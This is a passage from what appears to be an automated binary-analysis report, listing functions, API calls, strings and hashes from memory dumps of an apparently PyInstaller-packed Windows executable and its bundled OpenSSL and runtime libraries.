                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA221000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA224000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986626522.00007FFDFA225000.00000080.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986656867.00007FFDFA227000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 349153199-0
                                                              • Opcode ID: 1738fc931c46e0016abe01128f6c04fa9ae34eb026bf82ed76cd7c7c3c76c679
                                                              • Instruction ID: 43482800b17dd19b54c3e8f4e1fdab50bce0ca1be4f6b05779189df00458245e
                                                              • Opcode Fuzzy Hash: 1738fc931c46e0016abe01128f6c04fa9ae34eb026bf82ed76cd7c7c3c76c679
                                                              • Instruction Fuzzy Hash: 5881DF63F0C2436AFB5C9B25E460A7962DDAF49780F4640B5E96C837DEDE3CE9418700
                                                              Function 00007FFE1333E350 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 196COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                              • API String ID: 0-3207858774
                                                              • Opcode ID: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
                                                              • Instruction ID: 37fdf61f3253c2162322646ea04f3c5a1308dcda2cb5e4b9083b6fcb78e0723c
                                                              • Opcode Fuzzy Hash: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
                                                              • Instruction Fuzzy Hash: C8918E23B08E868DFB118F22D4502B8B7A0AF64B64F4480B1DA6D233B5EF3CE545D758
                                                              Function 00007FFE1333A13C Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+$Name::operator+=
                                                              • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                              • API String ID: 179159573-1464470183
                                                              • Opcode ID: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
                                                              • Instruction ID: 2f109d5da3a21b9cf19ba956a9a00f4879db4369045f94c3c25ea20935ac38a8
                                                              • Opcode Fuzzy Hash: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
                                                              • Instruction Fuzzy Hash: AE517B31E18E668DFB14CB66E8405BC73B0BB24BA4F508175DE2D72A78DF29E552C704
                                                              Function 00007FFE133388E4 Relevance: 15.2, APIs: 10, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID:
                                                              • API String ID: 2943138195-0
                                                              • Opcode ID: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
                                                              • Instruction ID: 3ac84797c902ce087a7b66d080f4cbc1ba7a33841b17cd6087009564ad5ccd29
                                                              • Opcode Fuzzy Hash: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
                                                              • Instruction Fuzzy Hash: 41618D62F08B569CFB01DBA2D8801EC67B1BB10BA8F408475DE2D7BA69DF78D549C344
                                                              Function 00007FF623F86290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: -$:$f$p$p
                                                              • API String ID: 3215553584-2013873522
                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                              • Instruction ID: 9d238fda8c9f3308c1e4cb0490d0686a42046e8540558dd632584e7c79064343
                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                              • Instruction Fuzzy Hash: CC12B361E0C28386FF285E16F95667DB691FB407D0F8445B5E78AA76C4DF3CE6808B02
                                                              Function 00007FF623F80FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: f$f$p$p$f
                                                              • API String ID: 3215553584-1325933183
                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                              • Instruction ID: e22e597ea99da124b5edc7471c5535819b2979fced62c430dfb04875c7b1c957
                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                              • Instruction Fuzzy Hash: FB12B662E0C14386FF285E16F8466B976A1FB407D0F844275D69AD7AC4DF3CE682CB02
                                                              Function 00007FFE133331A0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 211107550-393685449
                                                              • Opcode ID: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
                                                              • Instruction ID: 420f0d656a60d0e70b832d693b8efa823f14459a23b3cb141dfdddc832c6b576
                                                              • Opcode Fuzzy Hash: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
                                                              • Instruction Fuzzy Hash: 6FE1A372A08A818EE7119F36D4802BDB7A0FB64F78F148175EAAD67765CF38E485C704
                                                              Function 00007FF623F71050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2050909247-3659356012
                                                              • Opcode ID: da1dd6dbddad385723c59597d1054d51101576a26b0a48b923d642c7c543438c
                                                              • Instruction ID: 391ef77bf284fe9c0045cf11af3f084ef6b18b4641ede8c1e1378da13a1a22d9
                                                              • Opcode Fuzzy Hash: da1dd6dbddad385723c59597d1054d51101576a26b0a48b923d642c7c543438c
                                                              • Instruction Fuzzy Hash: C1418E21B1865282EE14DB12BC066BA6394FF44BC4F5445B2ED0CAB79ADF3CE606C742
                                                              Function 00007FFDFAFA41DD Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLastsetsockopt
                                                              • String ID: ..\s\crypto\bio\b_sock2.c$o
                                                              • API String ID: 1729277954-1872632005
                                                              • Opcode ID: 0d2034ac39a1f015537a20df33351dbf74ae8a5fab91621d70cfd5eb938fd7c6
                                                              • Instruction ID: 65c3392f7a0933d206e25fd621dcc0b1c4f118d6b824d810ddda1c29b46bbc14
                                                              • Opcode Fuzzy Hash: 0d2034ac39a1f015537a20df33351dbf74ae8a5fab91621d70cfd5eb938fd7c6
                                                              • Instruction Fuzzy Hash: CF51AD32B085438AE720DF21E825AAA7361FF85748F448235E6684BAEDCF3DE505DB50
                                                              Function 00007FF623F78660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF623F73CBB), ref: 00007FF623F78704
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF623F73CBB), ref: 00007FF623F7870A
                                                              • CreateDirectoryW.KERNEL32(?,00000000,00007FF623F73CBB), ref: 00007FF623F7874C
                                                                • Part of subcall function 00007FF623F78830: GetEnvironmentVariableW.KERNEL32(00007FF623F7388E), ref: 00007FF623F78867
                                                                • Part of subcall function 00007FF623F78830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF623F78889
                                                                • Part of subcall function 00007FF623F88238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F88251
                                                                • Part of subcall function 00007FF623F72810: MessageBoxW.USER32 ref: 00007FF623F728EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                              • API String ID: 3563477958-1339014028
                                                              • Opcode ID: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
                                                              • Instruction ID: 08435ed828119a6062aa203aad2da6aaa219b586a7ee88bafc29a2a5c142ab52
                                                              • Opcode Fuzzy Hash: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
                                                              • Instruction Fuzzy Hash: E8419221B1964244FE24AB66BD572F91251AF847C0F4441B6ED0DEB7EAEF3CE7058302
                                                              Function 00007FFE1333BE24 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                              • API String ID: 2943138195-2239912363
                                                              • Opcode ID: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
                                                              • Instruction ID: cb0704d65b70ff9023ddb8903b5109ba4b4afc68720f323e8377eadf21561623
                                                              • Opcode Fuzzy Hash: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
                                                              • Instruction Fuzzy Hash: 80514B62E18F558CFB15CB62E8412BCB7B0BB28B64F4491B5DA6D32AB5DF3C9044C718
                                                              Function 00007FFDFAFA23D8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                                              • String ID: Service-0x$_OPENSSL_isservice
                                                              • API String ID: 1944374717-1672312481
                                                              • Opcode ID: d4d7f13fea52a3178e6bf5d964a5a64b36e3e8d5b416d224cb6cd8592f581902
                                                              • Instruction ID: da22e54d2e8c53dfb956802475ec49197bc076ba5fa4befb0cb74d3ba13b90fb
                                                              • Opcode Fuzzy Hash: d4d7f13fea52a3178e6bf5d964a5a64b36e3e8d5b416d224cb6cd8592f581902
                                                              • Instruction Fuzzy Hash: 55416022B16B8396EB609F25D870AA83394EF457B4B444B35E57D8A7F8DF2CE1448340
                                                              Function 00007FF623F7EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                              • Instruction ID: eb643c0bc37bd795acbf4c05468a3c9163a91fc2428d84ae792535af211ed9a2
                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                              • Instruction Fuzzy Hash: 5BD1703290874186EF209F65E8463AD77A0FB55B88F100176EE4DAF795EF38E694C702
                                                              Function 00007FFE13335F0A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                              • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                              • API String ID: 1852475696-928371585
                                                              • Opcode ID: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
                                                              • Instruction ID: 7c6e89524c7c7e72c6d73508cd15d44b82f730037a3e2b972557347a7c13b968
                                                              • Opcode Fuzzy Hash: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
                                                              • Instruction Fuzzy Hash: 6F51AE62A09E46DAEA20CB16E4911B9A360FF64FB4F008571DA6D276B5DF3CE105C308
                                                              Function 00007FFE1333E148 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+$Name::operator+=
                                                              • String ID: {for
                                                              • API String ID: 179159573-864106941
                                                              • Opcode ID: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
                                                              • Instruction ID: 9ab0cf1fea9090dc97f16896fe7e9bd45b300b3b901652105cb49cb77db8b040
                                                              • Opcode Fuzzy Hash: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
                                                              • Instruction Fuzzy Hash: 19516C72A08E859DE7119F26C4413ECB3A0EB64B68F4480B1EA6C67BB5DF3CD554C318
                                                              Function 00007FF623F8ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF623F8F0AA,?,?,000002D8F3BC96E8,00007FF623F8AD53,?,?,?,00007FF623F8AC4A,?,?,?,00007FF623F85F3E), ref: 00007FF623F8EE8C
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF623F8F0AA,?,?,000002D8F3BC96E8,00007FF623F8AD53,?,?,?,00007FF623F8AC4A,?,?,?,00007FF623F85F3E), ref: 00007FF623F8EE98
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                              • Instruction ID: 469b06cd1df4b8ad1ce3252a2bb90352e068ca745cfb10fb75ea28ed6002bf38
                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                              • Instruction Fuzzy Hash: DE41F421B19A1241EE19CB17BC025752291BF58FD0F8A8179DD1DE7794FF3CEA498302
                                                              Function 00007FF623F72C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF623F73706,?,00007FF623F73804), ref: 00007FF623F72C9E
                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF623F73706,?,00007FF623F73804), ref: 00007FF623F72D63
                                                              • MessageBoxW.USER32 ref: 00007FF623F72D99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
